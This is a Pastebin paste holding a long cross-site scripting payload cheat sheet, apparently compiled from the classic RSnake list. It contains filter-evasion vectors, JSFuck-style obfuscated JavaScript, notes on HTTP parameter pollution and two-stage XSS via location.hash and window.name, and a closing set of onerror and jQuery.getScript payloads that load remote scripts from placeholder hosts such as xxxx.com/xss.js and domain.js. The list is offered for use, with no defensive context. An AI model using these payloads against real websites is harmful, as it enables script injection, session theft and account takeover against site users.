Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
- ><img id=XSS SRC=x onerror=alert(XSS);>
- ;!--"<XSS>=&{()}"
- <IMG id=XSS SRC="javascript:alert('XSS');">
- <IMG id=XSS SRC=javascript:alert('XSS')>
- <IMG id=XSS SRC=JaVaScRiPt:alert('XSS')>
- <IMG id=XSS SRC=javascript:alert("XSS")>
- <IMG id=XSS SRC=`javascript:alert("'XSS'")`>
- <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
- <IMG id=XSS SRC="jav ascript:alert('XSS');">
- <IMG id=XSS SRC="jav ascript:alert('XSS');">
- <IMG id=XSS SRC="javascript:alert('XSS');">
- <IMG id=XSS SRC="jav
- ascript:alert('XSS');">
- perl -e 'print "<IMG id=XSS SRC=java\0script:alert(\"XSS\")>";' > out
- <IMG id=XSS SRC=" javascript:alert('XSS');">
- <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
- <<SCRIPT>alert("XSS");//<</SCRIPT>
- \";alert('XSS');//
- <IMG id=XSS SRC='javascript:alert('XSS')
- <SCRIPT>alert(/XSS/.source)</SCRIPT>
- <BODY BACKGROUND="javascript:alert('XSS')">
- </TITLE><SCRIPT>alert("XSS");</SCRIPT>
- <INPUT TYPE="IMAGE" id=XSS SRC="javascript:alert('XSS');">
- <BODY ONLOAD=alert('XSS')>
- <IMG DYN id=XSS SRC="javascript:alert('XSS')">
- <IMG LOW id=XSS SRC="javascript:alert('XSS')">
- <BGSOUND id=XSS SRC="javascript:alert('XSS');">
- <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
- <IMG id=XSS SRC='vbscript:msgbox("XSS")'>
- <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
- <TABLE id=XSS BACKGROUND="javascript:alert('XSS')">
- <TABLE id=XSS><TD BACKGROUND="javascript:alert('XSS')">
- <DIV id=XSS STYLE="background-image: url(javascript:alert('XSS'))">
- <DIV id=XSS STYLE="width: expression(alert('XSS'));">
- <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
- <IFRAME id=XSS SRC="javascript:alert('XSS');"></IFRAME>
- <FRAMESET><FRAME id=XSS SRC="javascript:alert('XSS');"></FRAMESET>
- <TABLE BACKGROUND="javascript:alert('XSS')">
- <TABLE><TD BACKGROUND="javascript:alert('XSS')">"
- <DIV id=XSS STYLE="background-image: url(javascript:alert('XSS'))">
- <DIV id=XSS STYLE="width: expression(alert('XSS'));">
- <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
- <IMG id=XSS STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
- <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
- <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
- <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
- <BASE HREF="javascript:alert('XSS');//">
- <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
- a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval(a+b+c+d);
- <XML id=XSS><X><C><![CDATA[<IMG id=XSS SRC="javas]]><![CDATA[cript:alert('XSS');">]]></C></X><xml><SPAN DATAid=XSS SRC=#I DATAFLD=CDATAFORMATAS=HTML></SPAN>
- <XML ID="XSS"><I><B><IMG id=XSS SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML><SPAN DATAid=XSS SRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
- <XML id=XSS SRC="xsstest.xml" ID=I></XML><SPAN DATAid=XSS SRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
- <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>"></BODY></HTML>
- <? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
- <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
- <SCRIPT id=XSS SRC=http://127.0.0.1></SCRIPT>
- //--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
- <IMG id=XSS SRC=javascript:alert(String.fromCharCode(88,83,83))>
- <IMG id=XSS SRC="&14;javascript:alert('XSS');">
- <SCRIPT <B>=alert('XSS');"></SCRIPT>
- <IFRAME id=XSS SRC="javascript:alert('XSS'); <
- <SCRIPT>a=/XSS/nalert('XSS');</SCRIPT>
- <STYLE>li {list-style-image: url("javascript:alert('XSS');</STYLE><UL><LI>XSS
- <DIV STYLE="background-image: url(javascript:alert('XSS'));">
- <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"></HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
- <a href="javascript#alert('XSS');">
- <div onmouseover="alert('XSS');">,
- <input type="image" dynid=XSS SRC="javascript:alert('XSS');">
- &<script>alert('XSS');</script>">
- <IMG id=XSS SRC=&{alert('XSS');};>
- <a id=XSS href="about:<script>alert('XSS');</script>">
- <DIV id=XSS STYLE="binding: url(javascript:alert('XSS'));">
- <OBJECT classid=clsid:..." codebase="javascript:alert('XSS');">
- <style><!--</style><script>alert('XSS');//--></script>
- ![CDATA[<!--]]<script>alert('XSS');//--></script>
- <!-- -- --><script>alert('XSS');</script><!-- -- -->
- <img id=XSS SRC="blah"onmouseover="alert('XSS');">
- <img id=XSS SRC="blah>"onmouseover="alert('XSS');">
- <xml id="X"><a><b><script>alert('XSS');</script>;<b></a></xml>
- <div datafld="b" dataformatas="html" dataid=XSS SRC="#XSS"></div>
- [\xC0][\xBC]script>alert('XSS');[\xC0][\xBC]/script>
- <XML ID=I><X><C><![CDATA[<IMG id=XSS SRC="javas]]<![CDATA[cript:alert('XSS');">]]</C><X></xml>
- <form id="test" /><button form="test" formaction="javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32))">X
- <input id=XSS onfocus=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus>
- <select id=XSS onfocus=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus>
- <textarea id=XSS onfocus=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus>
- <keygen id=XSS onfocus=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus>
- <input id=XSS onblur=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus><input autofocus>
- <video id=XSS poster=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32))//
- <body id=XSS onscroll=eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32))><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
- <video><source onerror="javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32))">
- <video onerror="javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32))"><source>
- <iframe id=XSS / /onload=alert(/XSS/)></iframe>
- <iframe id=XSS / "onload=alert(/XSS/)></iframe>
- <iframe id=XSS///////onload=alert(/XSS/)></iframe>
- <iframe id=XSS "onload=alert(/XSS/)></iframe>
- <iframe id=XSS <?php echo chr(11)?> onload=alert(/XSS/)></iframe>
- <iframe id=XSS <?php echo chr(12)?> onload=alert(/XSS/)></iframe>
- " onfocus=alert(XSS) "> <"
- " onblur=alert(XSS) "> <"
- " onmouseover=alert(XSS) ">
- " onclick=alert(XSS) ">
- <FRAMESET><FRAME id=XSS SRC=\"javascript:alert('XSS');\"></FRAMESET>
- <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
- </textarea>'"><script>alert(XSS)</script>
- '""><script language="JavaScript"> alert('X \nS \nS');</script>
- </script></script><<<<script><>>>><<<script>alert(XSS)</script>
- <html><noalert><noscript>(XSS)</noscript><script>(XSS)</script>
- <INPUT TYPE="IMAGE" id=XSS SRC="javascript:alert('XSS');">
- '></select><script>alert(XSS)</script>
- }</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
- <SCRIPT>document.write("XSS");</SCRIPT>
- a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);
- ='><script>alert("xss")</script>
- <body background=javascript:'"><script>alert(XSS)</script>></body>
- data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
- <SCRIPT>alert('XSS');</SCRIPT>
- '';!--"<XSS>=&{()}
- <SCRIPT id=XSS SRC=http://xxxx.com/xss.js></SCRIPT>
- <IMG id=XSS SRC="javascript:alert('XSS');">
- <IMG id=XSS SRC=javascript:alert('XSS')>
- <IMG id=XSS SRC=JaVaScRiPt:alert('XSS')>
- <IMG id=XSS SRC=javascript:alert("XSS")>
- <IMG id=XSS SRC=`javascript:alert("RSnake says, 'XSS'")`>
- <IMG id=XSS SRC=javascript:alert(String.fromCharCode(88,83,83))>
- id=XSS SRC=<IMG 6;avascript:alert('XSS')>
- <IMG id=XSS SRC=javascript:alert('XSS')>
- <IMG id=XSS SRC=javascript:alert('XSS')>
- <IMG id=XSS SRC="jav ascript:alert('XSS');">
- <IMG id=XSS SRC="jav ascript:alert('XSS');">
- <IMG id=XSS SRC="javascript:alert('XSS');">
- <IMG id=XSS SRC="jav
- ascript:alert('XSS');">
- <IMG id=XSS SRC=" javascript:alert('XSS');">
- <SCRIPT/XSS id=XSS SRC="http://xxxx.com/xss.js"></SCRIPT>
- <SCRIPT id=XSS SRC=http://xxxx.com/xss.js?<B>
- <IMG id=XSS SRC="javascript:alert('XSS')"
- <SCRIPT>a=/XSS/
- \";alert('XSS');//
- <INPUT TYPE="IMAGE" id=XSS SRC="javascript:alert('XSS');">
- <BODY BACKGROUND="javascript:alert('XSS')">
- <BODY ONLOAD=alert('XSS')>
- <IMG DYNid=XSS SRC="javascript:alert('XSS')">
- <IMG LOWid=XSS SRC="javascript:alert('XSS')">
- <BGSOUND id=XSS SRC="javascript:alert('XSS');">
- <BR SIZE="&{alert('XSS')}">
- <LAYER id=XSS SRC="http://xxxx.com/scriptlet.html"></LAYER>
- <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
- <LINK REL="stylesheet" HREF="http://xxxx.com/xss.css">
- <STYLE>@import'http://xxxx.com/xss.css';</STYLE>
- <META HTTP-EQUIV="Link" Content="<http://xxxx.com/xss.css>; REL=stylesheet">
- <STYLE>BODY{-moz-binding:url("http://xxxx.com/xssmoz.xml#xss")}</STYLE>
- <IMG id=XSS SRC='vbscript:msgbox("XSS")'>
- <IMG id=XSS SRC="mocha:[code]">
- <IMG id=XSS SRC="livescript:[code]">
- <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
- <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
- <META HTTP-EQUIV="Link" Content="<javascript:alert('XSS')>; REL=stylesheet">
- <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
- <IFRAME id=XSS SRC="javascript:alert('XSS');"></IFRAME>
- <FRAMESET><FRAME id=XSS SRC="javascript:alert('XSS');"></FRAMESET>
- <TABLE BACKGROUND="javascript:alert('XSS')">
- <DIV STYLE="background-image: url(javascript:alert('XSS'))">
- <DIV STYLE="background-image: url(javascript:alert('XSS'))">
- <DIV STYLE="width: expression(alert('XSS'));">
- <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
- <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
- <XSS STYLE="xss:expression(alert('XSS'))">
- exp/*<XSS STYLE='no\xss:noxss("*//*");
- <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
- <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
- <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
- <BASE HREF="javascript:alert('XSS');//">
- <OBJECT TYPE="text/x-scriptlet" DATA="http://xxxx.com/scriptlet.html"></OBJECT>
- <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
- getURL("javascript:alert('XSS')")
- a="get";
- <!--<value><</script>
- <script>parent['alert'](1)</script>
- <script>self['alert'](2)</script>
- <script>top['alert'](3)</script>
- Split up JavaScript into HTML attributes
- <img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
- HTML is parsed before JavaScript
- <script>
- var junk = '</script><script>alert(1)</script>';
- </script>
- HTML is parsed before CSS
- <style>
- body { background-image:url('http://www.blah.com/</style><script>alert(1)</script>'); }
- </style>
- XSS in XML documents [doctype = text/xml] (Firefox, Chrome, Safari).
- <?xml version="1.0" ?>
- <someElement>
- <a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>
- </someElement>
- URI Schemes
- <iframe src="javascript:alert(1)"></iframe>
- <iframe src="vbscript:msgbox(1)"></iframe> (IE)
- <iframe src="data:text/html,<script>alert(0)</script>"></iframe> (Firefox, Chrome, Safari)
- <iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe> (Firefox, Chrome, Safari)
- HTTP Parameter Pollution
- http://target.com/something.xxx?a=val1&a=val2
- ASP.NET a = val1,val2
- ASP a = val1,val2
- JSP a = val1
- PHP a = val2
- Two Stage XSS via fragment identifier (bypass length restrictions / avoid server logging)
- <script>eval(location.hash.slice(1))</script>
- <script>eval(location.hash)</script> (Firefox)
- http://target.com/something.jsp?inject=<script>eval(location.hash.slice(1))</script>#alert(1)
- Two Stage XSS via name attribute
- <iframe src="http://target.com/something.jsp?inject=<script>eval(name)</script>" name="alert(1)"></iframe>
- Non-alphanumeric crazyness...
- <script>
- $=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();
- </script>
- <script>
- (+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()
- </script>
- <img src=x onerror=with(document)body.appendChild(document.createElement('script')).src="domain.js"></img>
- <img src=x onerror="with(document)body.appendChild(createElement('script')).src='domain.js'"></img>
- <img src=1 onerror=jQuery.getScript("domain.js")>
- <img src="#" onerror="$.getScript('domain.js')">
- <img src="#" onerror="var a=String.fromCharCode(47);$.getScript(a+a+'domain.sj'+a+'4091')">
- <img src='0' onerror=with(document)body.appendChild(createElement('script')).src='domain.js'>
- <img src="#" onload="s=document.createElement('script');s.src='domain.js'+Math.random();document.body.appendChild(s)" border="0">
- <img src=i onerror=eval(jQuery.getScript('domain.js'))>
- <img src=N onerror=eval(javascript:document.write(unescape(' <script src="domain.js"></script>'));)>
- <img src=x onerror=document.body.appendChild(document.createElement('script')).src='domain.js'>
- <img src=x onerror="with(document)body.appendChild(createElement('script')).src='domain.js'" width="0" height="0"></img>
Add Comment
Please, Sign In to add comment